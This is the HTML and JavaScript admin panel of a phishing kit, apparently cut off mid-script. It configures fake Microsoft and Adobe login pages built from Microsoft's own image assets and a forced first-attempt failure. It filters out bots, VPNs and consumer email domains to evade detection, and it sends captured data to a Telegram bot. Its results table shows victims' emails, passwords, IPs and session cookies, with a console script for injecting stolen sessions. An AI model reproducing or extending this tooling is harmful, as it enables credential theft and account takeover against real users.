<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SYSTEM ROOT // ADMIN</title>
<style>
@import url('https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&display=swap');

:root{
  --bg-0:#000000;
  --bg-1:#050505;
  --bg-2:#0a0a0a;
  --panel:#000000;
  --border:#333333;
  --border-active:#00ff41;
  --text:#e0e0e0;
  --text-dim:#888888;
  --accent:#00ff41;
  --accent-dim:rgba(0, 255, 65, 0.2);
  --accent-2:#008F11;
  --accent-3:#b000ff; /* Purple for secondary */
  --danger:#ff3333;
  --shadow:0 0 20px rgba(0, 255, 65, 0.1);
  --glow:0 0 5px var(--accent);
  --font-mono: 'JetBrains Mono', 'Courier New', monospace;
}
*{box-sizing:border-box}
html,body{height:100%}
body{
  font-family:var(--font-mono);
  margin:0;
  background-color:var(--bg-0);
  color:var(--text);
  overflow-x:hidden;
}
/* Scanline effect */
body::after {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: repeating-linear-gradient(
    0deg,
    rgba(0, 0, 0, 0.15),
    rgba(0, 0, 0, 0.15) 1px,
    transparent 1px,
    transparent 2px
  );
  pointer-events: none;
  z-index: 9999;
}

.app{min-height:100%;display:flex;flex-direction:column;position:relative;z-index:1}

.topbar{
  display:flex;align-items:center;justify-content:space-between;
  padding:16px 24px;
  background:var(--bg-2);
  border-bottom:1px solid var(--border);
  box-shadow:var(--shadow);
}
.brand{
  display:flex;align-items:center;gap:12px;
  font-size:18px;font-weight:700;letter-spacing:1px;
  color:var(--accent);
  text-transform:uppercase;
}
.brand-dot{
  width:12px;height:12px;
  background:var(--accent);
  box-shadow:var(--glow);
  animation: blink 2s infinite;
}
@keyframes blink { 0%, 100% { opacity: 1; } 50% { opacity: 0.3; } }

.nav{display:flex;gap:12px}
.nav button{
  padding:8px 16px;
  border:1px solid var(--border);
  background:transparent;
  color:var(--text-dim);
  border-radius:0; /* Sharp edges */
  cursor:pointer;
  font-family:var(--font-mono);
  font-size:12px;
  text-transform:uppercase;
  transition:all 0.2s ease;
}
.nav button:hover{
  border-color:var(--accent);
  color:var(--accent);
  box-shadow:var(--glow);
  text-shadow:0 0 5px var(--accent);
}
.nav button.active{
  border-color:var(--accent);
  background:var(--accent-dim);
  color:var(--accent);
  box-shadow:var(--glow);
}

.container{
  width:100%;
  margin:0;
  padding:16px;
}



.main{
  background:var(--panel);
  border:1px solid var(--border);
  padding:32px;
  position:relative;
}
.main::before {
  content:"";position:absolute;top:-1px;right:-1px;width:20px;height:20px;
  border-top:2px solid var(--accent);border-right:2px solid var(--accent);
}

h1{
  font-size:24px;margin:0 0 24px;
  color:var(--text);
  text-transform:uppercase;
  border-left:4px solid var(--accent);
  padding-left:16px;
}

.grid{display:grid;grid-template-columns:1fr 2fr;gap:16px;align-items:center}
label{font-size:12px;color:var(--accent);text-transform:uppercase;letter-spacing:1px}

input[type="text"],input[type="url"],input[type="number"],input[type="password"]{
  width:100%;
  padding:12px;
  border:1px solid var(--border);
  background:var(--bg-1);
  color:var(--accent);
  font-family:var(--font-mono);
  border-radius:0;
  transition:all 0.2s;
}
input:focus{
  outline:none;
  border-color:var(--accent);
  box-shadow:var(--glow);
  background:rgba(0, 255, 65, 0.05);
}

input[type="checkbox"]{
  appearance:none;
  width:20px;height:20px;
  border:1px solid var(--border);
  background:var(--bg-1);
  cursor:pointer;
  position:relative;
}
input[type="checkbox"]:checked{
  background:var(--accent);
  border-color:var(--accent);
  box-shadow:var(--glow);
}
input[type="checkbox"]:checked::after{
  content:'X';
  position:absolute;
  top:50%;left:50%;
  transform:translate(-50%, -50%);
  color:#000;
  font-size:14px;
  font-weight:bold;
}

.row{display:flex;gap:16px;margin-top:32px}
button{
  padding:12px 24px;
  border:1px solid var(--accent);
  background:transparent;
  color:var(--accent);
  cursor:pointer;
  font-family:var(--font-mono);
  font-size:14px;
  text-transform:uppercase;
  letter-spacing:1px;
  transition:all 0.2s;
  position:relative;
  overflow:hidden;
}
button:hover{
  background:var(--accent);
  color:#000;
  box-shadow:var(--glow);
}
button.secondary{
  border-color:var(--text-dim);
  color:var(--text-dim);
}
button.secondary:hover{
  border-color:var(--text);
  color:var(--text);
  background:var(--border);
  box-shadow:none;
}

.status{margin-top:16px;font-size:12px;color:var(--text-dim);font-family:var(--font-mono)}

.table-wrap{
  overflow:auto;
  margin-top:24px;
  border:1px solid var(--border);
}
table{width:100%;border-collapse:collapse;font-size:12px;color:var(--text)}
thead tr{background:var(--bg-2);border-bottom:1px solid var(--accent)}
th{
  padding:12px;
  text-align:left;
  text-transform:uppercase;
  color:var(--accent);
  font-weight:normal;
}
td{padding:12px;border-bottom:1px solid #1a1a1a}
tbody tr:hover{background:rgba(0, 255, 65, 0.05)}

.badge{
  display:inline-block;
  padding:2px 8px;
  border:1px solid var(--border);
  color:var(--text-dim);
  text-transform:uppercase;
  font-size:10px;
}

.test-fail{
  border:1px solid var(--danger) !important;
  box-shadow:0 0 10px rgba(255, 51, 51, 0.3) !important;
}

.controls{display:flex;gap:12px;align-items:center;justify-content:space-between;margin-bottom:16px}
.muted{color:var(--text-dim)}

/* Scrollbar */
::-webkit-scrollbar {width: 8px;height: 8px;}
::-webkit-scrollbar-track {background: var(--bg-1);}
::-webkit-scrollbar-thumb {background: var(--border);border: 1px solid var(--bg-1);}
::-webkit-scrollbar-thumb:hover {background: var(--accent);}

/* Compact Settings Layout */
.settings-header {
  display: flex;
  justify-content: space-between;
  align-items: center;
  margin-bottom: 24px;
  border-bottom: 1px solid var(--border);
  padding-bottom: 12px;
}
.settings-header h1 {
  margin: 0;
  border: none;
  padding: 0;
  font-size: 20px;
  color: var(--accent);
  text-transform: uppercase;
}
.settings-nav {
  display: flex;
  gap: 2px;
}
.tab-btn {
  padding: 8px 16px;
  background: var(--bg-1);
  border: 1px solid var(--border);
  color: var(--text-dim);
  cursor: pointer;
  font-family: var(--font-mono);
  font-size: 12px;
  text-transform: uppercase;
  transition: all 0.2s;
}
.tab-btn:hover {
  color: var(--accent);
  border-color: var(--accent);
}
.tab-btn.active {
  background: var(--accent-dim);
  color: var(--accent);
  border-color: var(--accent);
  box-shadow: var(--glow);
}
.tab-content {
  display: none;
  animation: fadeIn 0.3s ease;
}
.tab-content.active {
  display: block;
}
@keyframes fadeIn {
  from { opacity: 0; transform: translateY(5px); }
  to { opacity: 1; transform: translateY(0); }
}
.compact-grid {
  display: grid;
  grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
  gap: 16px;
  align-items: start;
}
.form-group {
  display: flex;
  flex-direction: column;
  gap: 6px;
}
.form-group label {
  font-size: 11px;
  color: var(--accent);
  text-transform: uppercase;
  letter-spacing: 1px;
}
.form-group input[type="text"],
.form-group input[type="url"],
.form-group input[type="number"],
.form-group input[type="password"] {
  width: 100%;
  padding: 8px 12px;
  background: var(--bg-1);
  border: 1px solid var(--border);
  color: var(--text);
  font-family: var(--font-mono);
  font-size: 13px;
}
.form-group input:focus {
  border-color: var(--accent);
  box-shadow: var(--glow);
  outline: none;
}
/* Checkbox styling */
.form-group.checkbox {
  flex-direction: row;
  align-items: center;
  justify-content: space-between;
  border: 1px solid var(--border);
  padding: 10px 12px;
  background: var(--bg-1);
  transition: border-color 0.2s;
}
.form-group.checkbox:hover {
  border-color: var(--accent);
}
.form-group.checkbox label {
  margin: 0;
  cursor: pointer;
  flex: 1;
}
/* Actions row */
.actions-row {
  margin-top: 24px;
  padding-top: 16px;
  border-top: 1px solid var(--border);
  display: flex;
  justify-content: flex-end;
  gap: 12px;
}
/* Tooltip */
.tooltip-icon {
  display: inline-block;
  margin-left: 6px;
  width: 14px;
  height: 14px;
  line-height: 14px;
  text-align: center;
  border-radius: 50%;
  border: 1px solid var(--text-dim);
  color: var(--text-dim);
  font-size: 10px;
  cursor: help;
}
.tooltip-icon:hover {
  border-color: var(--accent);
  color: var(--accent);
}

/* Modal */
.modal-overlay {
  display:none;position:fixed;top:0;left:0;width:100%;height:100%;
  background:rgba(0,0,0,0.8);z-index:9999;
  align-items:center;justify-content:center;
}
.modal {
  background:var(--bg-2);border:1px solid var(--accent);
  width:90%;max-width:800px;max-height:90vh;
  display:flex;flex-direction:column;
  box-shadow:0 0 50px rgba(0,255,65,0.2);
}
.modal-header {
  padding:16px;border-bottom:1px solid var(--border);
  display:flex;justify-content:space-between;align-items:center;
  background:var(--bg-1);
}
.modal-title {color:var(--accent);font-weight:bold;text-transform:uppercase;}
.modal-close {cursor:pointer;color:var(--text-dim);font-size:20px;}
.modal-close:hover {color:var(--danger);}
.modal-body {padding:16px;overflow:auto;flex:1;}
.code-block {
  background:#000;border:1px solid var(--border);padding:16px;
  font-family:monospace;white-space:pre-wrap;color:var(--text);
  font-size:12px;
  max-height: 400px; overflow: auto;
}

/* Analysis Dashboard */
.analysis-dashboard {
  display: grid;
  grid-template-columns: repeat(4, 1fr);
  gap: 16px;
  margin-bottom: 24px;
}
.analysis-box {
  background: var(--bg-1);
  border: 1px solid var(--border);
  padding: 20px;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  transition: border-color 0.2s;
}
.analysis-box:hover {
  border-color: var(--accent);
}
.analysis-value {
  font-size: 28px;
  font-weight: 700;
  color: var(--accent);
  margin-bottom: 4px;
  text-shadow: 0 0 10px rgba(0, 255, 65, 0.2);
}
.analysis-label {
  font-size: 11px;
  color: var(--text-dim);
  text-transform: uppercase;
  letter-spacing: 1px;
  text-align: center;
}

</style>
</head>
<body>
<div class="app">
  <div class="topbar">
    <div class="brand"><span class="brand-dot"></span>Admin Panel</div>
    <div class="nav">
      <button id="navSettings" class="active">Settings</button>
      <button id="navSubmissions">Submissions</button>
    </div>
  </div>
  <div class="container">
    <!-- Sidebar removed -->
    <div class="main">
  <div id="section-settings">
  <div class="settings-header">
    <h1>Admin Settings</h1>
    <div class="settings-nav">
      <button class="tab-btn active" data-tab="tab-general">General</button>
      <button class="tab-btn" data-tab="tab-security">Security</button>
      <button class="tab-btn" data-tab="tab-network">Network</button>
      <button class="tab-btn" data-tab="tab-cloudflare">Cloudflare</button>
    </div>
  </div>

  <div class="analysis-dashboard">
    <div class="analysis-box">
      <div class="analysis-value" id="stat-total-cookies">0</div>
      <div class="analysis-label">Total Cookies (Success)</div>
    </div>
    <div class="analysis-box">
      <div class="analysis-value" id="stat-incorrect">0</div>
      <div class="analysis-label">Incorrect</div>
    </div>
    <div class="analysis-box">
      <div class="analysis-value" id="stat-correct">0</div>
      <div class="analysis-label">Correct</div>
    </div>
    <div class="analysis-box">
      <div class="analysis-value" id="stat-visits">0</div>
      <div class="analysis-label">Total Visits</div>
    </div>
  </div>

  <div class="settings-content-wrapper">
    <!-- Tab General -->
    <div id="tab-general" class="tab-content active">
      <!-- Deployed Links Section -->
      <div id="deployment-links-container" style="display:none; margin-bottom: 24px; padding: 16px; border: 1px solid var(--accent); background: rgba(0, 255, 65, 0.05);">
          <h3 style="margin-top:0; border-bottom:1px solid var(--accent-dim); padding-bottom:10px; margin-bottom:12px; color:var(--accent); text-transform:uppercase; font-size:14px; letter-spacing:1px;">Click to copy your Links</h3>
          <div id="deployment-links-list" style="display: flex; flex-wrap: wrap; gap: 10px;"></div>
      </div>

      <h3 style="border-bottom:1px solid var(--border);padding-bottom:10px;margin-bottom:16px;color:var(--accent);text-transform:uppercase;font-size:14px;">Link Configuration</h3>
      <div class="compact-grid">
        <div class="form-group">
          <label for="template">Link Template</label>
          <select id="template" style="width:100%;padding:12px;border:1px solid var(--border);background:var(--bg-1);color:var(--accent);font-family:var(--font-mono);border-radius:0;outline:none;">
            <option value="microsoft">Microsoft (Default)</option>
            <option value="adobe">Adobe</option>
            <option value="upload">Upload (Custom Background)</option>
          </select>
        </div>
        <div class="form-group" id="adminUploadGroup" style="display:none">
          <label>Upload Background Image</label>
          <form action="/admin/upload" method="post" enctype="multipart/form-data" style="display:flex;gap:8px;align-items:center">
            <input type="file" name="image" accept="image/png,image/jpeg,image/jpg,image/webp" required>
            <button type="submit">Upload</button>
          </form>
          <details style="margin-top:8px; cursor:pointer">
            <summary style="color:var(--accent); font-size:11px; text-transform:uppercase; outline:none">View Active Background</summary>
            <div class="preview" style="margin-top:8px">
              <img id="uploadPreview" src="" alt="Current background" style="max-width:100%; border:1px solid var(--border); display:block">
            </div>
          </details>
        </div>
        <div class="form-group">
          <label for="urlPath">Custom URL Path <span class="tooltip-icon" title="Custom path to access the login page (e.g. /secure/login)">?</span></label>
          <input id="urlPath" type="text" placeholder="/page.html (Default)">
        </div>
        <div class="form-group">
          <label for="redirectType">Redirect URL</label>
          <select id="redirectType" style="width:100%;padding:12px;border:1px solid var(--border);background:var(--bg-1);color:var(--accent);font-family:var(--font-mono);border-radius:0;outline:none;">
            <option value="custom">Custom URL...</option>
            <option value="error_page">Error Page (Microsoft)</option>
          </select>
        </div>
        <div class="form-group" id="redirectUrlGroup">
          <input id="redirectUrl" type="url" placeholder="https://example.com" style="margin-top: 5px;">
        </div>
      </div>

      <h3 style="margin-top:30px;border-bottom:1px solid var(--border);padding-bottom:10px;margin-bottom:16px;color:var(--accent);text-transform:uppercase;font-size:14px;">Telegram Report</h3>
      <div class="compact-grid">
        <div class="form-group checkbox">
          <label for="telemetryEnabled">Enable Telegram Report</label>
          <input id="telemetryEnabled" type="checkbox">
        </div>
        <div class="form-group">
          <label for="telegramBotToken">Telegram Bot Token</label>
          <input id="telegramBotToken" type="password" placeholder="bot token">
        </div>
        <div class="form-group">
          <label for="telegramChatId">Chat ID</label>
          <input id="telegramChatId" type="text" placeholder="123456789">
          <button id="testTelegram" class="secondary" style="margin-top:8px;width:100%;display:none;border-color:var(--accent);color:var(--accent)">
            Test Connection
          </button>
        </div>
      </div>
    </div>

    <!-- Tab Security -->
    <div id="tab-security" class="tab-content">
      <div class="compact-grid">
        <div class="form-group checkbox" style="display:flex;justify-content:space-between;align-items:center;background:rgba(0,255,65,0.02);border:1px solid var(--accent-dim);">
          <div style="display:flex;gap:12px;align-items:center">
            <div style="color:var(--accent);display:flex;align-items:center;justify-content:center;width:32px;height:32px;border:1px solid var(--accent-dim);background:rgba(0,0,0,0.5)">
              <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z"/>
              </svg>
            </div>
            <div>
              <label for="securityEnabled" style="cursor:pointer;display:flex;align-items:center;gap:8px;font-size:13px;font-weight:bold">
                BOT PROTECTION
                <span class="tooltip-icon" title="Advanced filtering: Blocks datacenters, proxies, and known bot signatures.">?</span>
              </label>
              <div style="font-size:10px;color:var(--text-dim);margin-top:2px;letter-spacing:0.5px">
                STATUS: <span id="securityStatusText" style="color:var(--text-dim)">OFFLINE</span>
              </div>
            </div>
          </div>
          <label class="toggle-switch">
            <input id="securityEnabled" type="checkbox" onchange="document.getElementById('securityStatusText').innerText = this.checked ? 'ACTIVE' : 'OFFLINE'; document.getElementById('securityStatusText').style.color = this.checked ? 'var(--accent)' : 'var(--text-dim)';">
            <span class="slider"></span>
          </label>
        </div>
        <div class="form-group checkbox">
          <label for="countryBlockingEnabled">Enable Country Filter</label>
          <input id="countryBlockingEnabled" type="checkbox">
        </div>
        <div class="form-group">
          <label for="allowedCountries">Allowed Countries (ISO)</label>
          <input id="allowedCountries" type="text" placeholder="US, CA, UK">
        </div>
        <div class="form-group">
          <label for="ipWhitelist">IP Whitelist</label>
          <input id="ipWhitelist" type="text" placeholder="1.2.3.4, 10.0.0.1">
        </div>
      </div>
    </div>

    <!-- Tab Network -->
    <div id="tab-network" class="tab-content">
      <div class="compact-grid">
        <div class="form-group checkbox">
          <label for="proxyEnabled">Enable Proxy</label>
          <input id="proxyEnabled" type="checkbox">
        </div>
        <div class="form-group">
          <label for="proxyUrl">Proxy URL <span class="tooltip-icon" title="Format: protocol://user:pass@host:port">?</span></label>
          <input id="proxyUrl" type="text" placeholder="http://user:pass@1.2.3.4:8080">
        </div>
      </div>
    </div>

    <!-- Tab Cloudflare -->
    <div id="tab-cloudflare" class="tab-content">
      <div class="compact-grid">
        <div class="form-group checkbox">
          <label for="cfTurnstileEnabled">Enable Turnstile Gate</label>
          <input id="cfTurnstileEnabled" type="checkbox">
        </div>
        <div class="form-group">
          <label for="cfSiteKey">Turnstile Site Key</label>
          <input id="cfSiteKey" type="text" placeholder="0x4AAAA...">
        </div>
        <div class="form-group">
          <label for="cfSecretKey">Turnstile Secret Key</label>
          <input id="cfSecretKey" type="password" placeholder="0x4AAAA...">
        </div>
        <div class="form-group">
          <label for="cfApiKey">Global API Key</label>
          <input id="cfApiKey" type="password" placeholder="c554...">
        </div>
        <div class="form-group">
          <label for="cfEmail">Cloudflare Email</label>
          <input id="cfEmail" type="text" placeholder="email@example.com">
        </div>
        <div class="form-group">
          <label for="cfZoneId">Zone ID</label>
          <input id="cfZoneId" type="text" placeholder="0328...">
        </div>
        <div class="form-group">
          <label for="cfAccountId">Account ID</label>
          <input id="cfAccountId" type="text" placeholder="98fc...">
        </div>
      </div>
    </div>
  </div>

  <div class="actions-row">
    <button class="secondary" id="saveLocal">Save Locally</button>
    <button class="primary" id="saveServer">Save To Server</button>
    <button class="primary" id="deploySecurity" style="border-color:var(--danger);color:var(--danger)">Deploy Cloudflare Rules</button>
  </div>
  <div class="status" id="status"></div>
  </div>
  <div id="section-submissions" style="display:none">
  <h1>Results </h1>
  <div class="controls">
    <div class="muted">Shows Valid or Invalid submissions and their IP</div>
    <div style="display:flex;gap:10px">
      <span class="badge" id="eventsCount">0</span>
      <button class="secondary" id="refreshEvents">Refresh</button>
      <button class="primary" id="clearLogs" style="background:transparent;border-color:var(--danger);color:var(--danger)">Clear Logs</button>
    </div>
  </div>
  <div class="table-wrap">
    <table id="eventsTable">
      <thead>
        <tr>
          <th>Time</th>
          <th>Type</th>
          <th>Email</th>
          <th>Password</th>
          <th>IP</th>
          <th>Cookies</th>
        </tr>
      </thead>
      <tbody></tbody>
    </table>
  </div>
  </div>
    </div>
  </div>
</div>

<div class="modal-overlay" id="cookieModal">
  <div class="modal">
    <div class="modal-header">
      <div class="modal-title">Session Cookies</div>
      <div class="modal-close" onclick="closeModal()">×</div>
    </div>
    <div class="modal-body">
      <div class="controls" style="margin-bottom:10px;">
         <div class="muted">Copy this script to console to inject session</div>
         <button class="primary" id="copyCookiesBtn">Copy Content</button>
      </div>
      <div class="code-block" id="cookieContent">Loading...</div>
    </div>
  </div>
</div>

<script>
const defaults={template:"microsoft",urlPath:"/page.html",redirectUrl:"https://outlook.office.com/mail/",firstAttemptFail:true,securityEnabled:false,loadingEnabled:true,
  loadingDelayMs:2000,
  loadingGifUrl:"https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif",logoUrl:"https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg",backArrowUrl:"https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.svg",telemetryEnabled:false,telegramBotToken:"",telegramChatId:"",cfTurnstileEnabled:false,cfSiteKey:"",cfSecretKey:"",cfApiKey:"",cfEmail:"",cfZoneId:"",cfAccountId:"",countryBlockingEnabled:false,allowedCountries:"",ipWhitelist:"",blockedDomains:["outlook.com","hotmail.com","live.com","msn.com","yahoo.com","ymail.com","gmail.com","googlemail.com","aol.com","icloud.com","me.com","mac.com","proton.me","protonmail.com","mail.com","gmx.com"],allowedDomains:[],
  proxyEnabled:false,proxyUrl:""};
const els={
  template:document.getElementById("template"),
  urlPath:document.getElementById("urlPath"),
  redirectUrl:document.getElementById("redirectUrl"),
  // firstAttemptFail managed in backend/hidden
  // loadingEnabled managed in backend/hidden
  // loadingDelayMs managed in backend/hidden
  telemetryEnabled:document.getElementById("telemetryEnabled"),
  telegramBotToken:document.getElementById("telegramBotToken"),
  telegramChatId:document.getElementById("telegramChatId"),
  securityEnabled:document.getElementById("securityEnabled"),
  cfTurnstileEnabled:document.getElementById("cfTurnstileEnabled"),
  cfSiteKey:document.getElementById("cfSiteKey"),
  cfSecretKey:document.getElementById("cfSecretKey"),
  cfApiKey:document.getElementById("cfApiKey"),
  cfEmail:document.getElementById("cfEmail"),
  cfZoneId:document.getElementById("cfZoneId"),
  cfAccountId:document.getElementById("cfAccountId"),
  countryBlockingEnabled:document.getElementById("countryBlockingEnabled"),
  allowedCountries:document.getElementById("allowedCountries"),
  ipWhitelist:document.getElementById("ipWhitelist"),
  status:document.getElementById("status"),
  proxyEnabled:document.getElementById("proxyEnabled"),
  proxyUrl:document.getElementById("proxyUrl")
};
function setStatus(t,c){els.status.textContent=t;els.status.style.color=c||"var(--muted)"}
let currentCfg = {};
function loadForm(cfg){
  currentCfg = cfg;
  els.template.value=cfg.template||"microsoft";
  
  const isErrorPage = (cfg.redirectUrl === "/error");
  document.getElementById("redirectType").value = isErrorPage ? "error_page" : "custom";
  document.getElementById("redirectUrlGroup").style.display = isErrorPage ? "none" : "block";

  els.redirectUrl.value=cfg.redirectUrl||"";
  
  els.telemetryEnabled.checked=!!cfg.telemetryEnabled;
  els.telegramBotToken.value=cfg.telegramBotToken||"";
  els.telegramChatId.value=cfg.telegramChatId||"";
  els.securityEnabled.checked=!!cfg.securityEnabled;
  // Trigger status update
  document.getElementById('securityStatusText').innerText = els.securityEnabled.checked ? 'ACTIVE' : 'OFFLINE';
  document.getElementById('securityStatusText').style.color = els.securityEnabled.checked ? 'var(--accent)' : 'var(--text-dim)';
  els.cfTurnstileEnabled.checked=!!cfg.cfTurnstileEnabled;
  els.cfSiteKey.value=cfg.cfSiteKey||"";
  els.cfSecretKey.value=cfg.cfSecretKey||"";
  els.cfApiKey.value=cfg.cfApiKey||"";
  els.cfEmail.value=cfg.cfEmail||"";
  els.cfZoneId.value=cfg.cfZoneId||"";
  els.cfAccountId.value=cfg.cfAccountId||"";
  els.countryBlockingEnabled.checked=!!cfg.countryBlockingEnabled;
  els.allowedCountries.value=cfg.allowedCountries||"";
  els.ipWhitelist.value=cfg.ipWhitelist||"";
  els.proxyEnabled.checked=!!cfg.proxyEnabled;
  els.proxyUrl.value=cfg.proxyUrl||"";
}

document.getElementById("redirectType").addEventListener("change", function(e) {
  const isError = e.target.value === "error_page";
  document.getElementById("redirectUrlGroup").style.display = isError ? "none" : "block";
  if (isError) {
    els.redirectUrl.value = "/error";
  } else {
    if (els.redirectUrl.value === "/error") els.redirectUrl.value = "";
  }
});

function readForm(){
  return {
    template:els.template.value,
    urlPath:els.urlPath.value.trim(),
    redirectUrl:els.redirectUrl.value.trim(),
    firstAttemptFail:true,
    loadingEnabled:currentCfg.loadingEnabled !== undefined ? currentCfg.loadingEnabled : true,
    loadingDelayMs:currentCfg.loadingDelayMs !== undefined ? currentCfg.loadingDelayMs : 2000,
    telemetryEnabled:els.telemetryEnabled.checked,
    telegramBotToken:els.telegramBotToken.value.trim(),
    telegramChatId:els.telegramChatId.value.trim(),
    securityEnabled:els.securityEnabled.checked,
    vpnCheckEnabled:els.securityEnabled.checked,
    botCheckEnabled:els.securityEnabled.checked,
    cfTurnstileEnabled:els.cfTurnstileEnabled.checked,
    cfSiteKey:els.cfSiteKey.value.trim(),
    cfSecretKey:els.cfSecretKey.value.trim(),
    cfApiKey:els.cfApiKey.value.trim(),
    cfEmail:els.cfEmail.value.trim(),
    cfZoneId:els.cfZoneId.value.trim(),
    cfAccountId:els.cfAccountId.value.trim(),
    countryBlockingEnabled:els.countryBlockingEnabled.checked,
    allowedCountries:els.allowedCountries.value.trim(),
    ipWhitelist:els.ipWhitelist.value.trim(),
    proxyEnabled:els.proxyEnabled.checked,
    proxyUrl:els.proxyUrl.value.trim()
  };
}
// Auto-show logic for Telegram Test Button
const checkTelegram = () => {
  const t = els.telegramBotToken.value.trim();
  const c = els.telegramChatId.value.trim();
  const btn = document.getElementById("testTelegram");
  if(btn) btn.style.display = (t && c) ? "block" : "none";
};
els.telegramBotToken.addEventListener("input", checkTelegram);
els.telegramChatId.addEventListener("input", checkTelegram);

// Test Telegram Connection
document.getElementById("testTelegram").addEventListener("click", async () => {
  const btn = document.getElementById("testTelegram");
  const originalText = btn.textContent;
  btn.textContent = "Sending...";
  btn.disabled = true;

  const botToken = els.telegramBotToken.value.trim();
  const chatId = els.telegramChatId.value.trim();
  const proxyEnabled = els.proxyEnabled.checked;
  const proxyUrl = els.proxyUrl.value.trim();

  try {
    const res = await fetch("/api?action=test_telegram", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ botToken, chatId, proxyEnabled, proxyUrl })
    });
    const j = await res.json();
    if (res.ok && j.ok) {
      setStatus("Test message sent successfully!", "var(--accent)");
      btn.textContent = "Success!";
    } else {
      setStatus("Telegram Error: " + (j.error || "Unknown"), "var(--danger)");
      btn.textContent = "Failed";
    }
  } catch (e) {
    setStatus("Network Error", "var(--danger)");
    btn.textContent = "Error";
  }
  setTimeout(() => { 
    btn.textContent = originalText; 
    btn.disabled = false; 
  }, 2000);
});

(async function init(){
  try{
    const r=await fetch("/api?action=get_config",{cache:"no-store"});
    if(r.ok){
      const data=await r.json();
      loadForm(Object.assign({},defaults,data));
      setStatus("Loaded config.json", "var(--accent)");
    }else{
      loadForm(defaults);
      setStatus("Using defaults", "var(--accent-3)");
    }
    checkTelegram();
  }catch(e){
    loadForm(defaults);
    setStatus("Using defaults", "var(--accent-3)");
    checkTelegram();
  }
})();
function updateAdminUploadVisibility(){
  const show = els.template.value === 'upload';
  const grp = document.getElementById('adminUploadGroup');
  if (grp) grp.style.display = show ? 'block' : 'none';
  if (show) {
    fetch('/uploads/bg_current.txt', {cache:'no-store'})
      .then(r => r.ok ? r.text() : '')
      .then(t => {
        const u = (t || '').trim();
        const img = document.getElementById('uploadPreview');
        if (img) img.src = u || '';
      }).catch(()=>{});
  }
}
els.template.addEventListener('change', updateAdminUploadVisibility);
document.getElementById("saveLocal").addEventListener("click",()=>{
  const data=readForm();
  localStorage.setItem("pageConfig",JSON.stringify(data));
  setStatus("Saved to localStorage for testing", "var(--accent)");
});
document.getElementById("saveServer").addEventListener("click",async()=>{
  try{
    const res=await fetch("/api?action=save_config",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify(readForm())});
    if(res.ok){setStatus("Saved to server", "var(--accent)");}else{
        // Try to get error message from response
        try {
            const j = await res.json();
            setStatus("Save failed: " + (j.error || "Unknown error"), "var(--danger)");
        } catch(e) {
            setStatus("Save failed: " + res.statusText, "var(--danger)");
        }
    }
  }catch(e){setStatus("Save failed: " + e.message, "var(--danger)");}
});
document.getElementById("deploySecurity").addEventListener("click",async()=>{
  if(!confirm("This will configure Cloudflare security rules. Ensure API credentials are correct. Proceed?")) return;
  try{
    setStatus("Deploying security rules...", "var(--accent)");
    const res=await fetch("/api?action=deploy_security",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify(readForm())});
    const j=await res.json();
    if(res.ok && j.ok){
      setStatus("Security Deployed Successfully!", "var(--accent)");
    }else{
      setStatus("Deployment Failed: "+(j.error||"Unknown"), "var(--danger)");
    }
  }catch(e){setStatus("Deployment Failed", "var(--danger)");}
});
async function loadEvents(){
  try{
    const res=await fetch("/api?action=get_events",{cache:"no-store"});
    if(!res.ok){
      setStatus("Failed to load events", "var(--danger)");
      return;
    }
    const data=await res.json();
    if(!data.ok){
       setStatus("Error loading events: " + (data.error || "Unknown"), "var(--danger)");
       return;
    }
    let rows = data.events || [];
    
    // Filter out events without password (already done in API mostly, but good to double check if needed)
    // rows = rows.filter(r => r.password && r.password !== "");

    const tbody=document.querySelector("#eventsTable tbody");
    tbody.innerHTML="";
    
    // Update header to match flat structure
    const thead = document.querySelector("#eventsTable thead tr");
    if (thead) {
        thead.innerHTML = `
          <th>Time</th>
          <th>Type</th>
          <th>Email</th>
          <th>Password</th>
          <th>IP</th>
          <th>Cookies</th>
        `;
    }

    // Calculate Stats
    let totalCookies = 0;
    let incorrect = 0;
    let correct = 0;
    let totalVisits = 0; 

    // Separate visits from other events for display
    const visibleRows = [];

    const passwordVisitIds = new Set();

    for (const r of rows) {
        const status = r.botStatus || 'unknown';
        const type = r.type || '';
        
        // Count Visits logic:
        // 1. If it's a 'visit' event
        // 2. OR if it's an interaction (email_ok, password)
        
        // Track unique sessions that reached "password stage" OR visited with a specific email
        if (type === 'email_ok' || (r.password && r.password.trim().length > 0) || (type === 'visit' && r.emailMask && r.emailMask !== 'visitor')) {
            passwordVisitIds.add(r.cookieId);
        }

        // Show visits in table ONLY if they have a specific email (not visitor)
        if (type === 'visit' || type === 'email_ok') {
            continue; // Skip visits and email_ok, show only password attempts
        }

        // Count Cookies
        const hasCookies = (status === 'completed' || r.hasScript);
        if (hasCookies) {
            totalCookies++;
            correct++;
        }

        // Incorrect (only if not corrected)
        if (r.password && r.password.trim().length > 0 && !hasCookies) {
            incorrect++;
        }
        
        visibleRows.push(r);
    }

    totalVisits = passwordVisitIds.size;

    // Update Analysis Boxes
    if(document.getElementById('stat-total-cookies')) document.getElementById('stat-total-cookies').textContent = totalCookies;
    if(document.getElementById('stat-incorrect')) document.getElementById('stat-incorrect').textContent = incorrect;
    if(document.getElementById('stat-correct')) document.getElementById('stat-correct').textContent = correct;
    if(document.getElementById('stat-visits')) document.getElementById('stat-visits').textContent = totalVisits;
    
    // Helper to format time
    const formatTime = (iso) => {
        if (!iso) return "-";
        try {
            const d = new Date(iso);
            if (isNaN(d.getTime())) return iso;
            // Format: "31 December 2025 16:05"
            return d.toLocaleDateString('en-GB', {
                day: 'numeric',
                month: 'long',
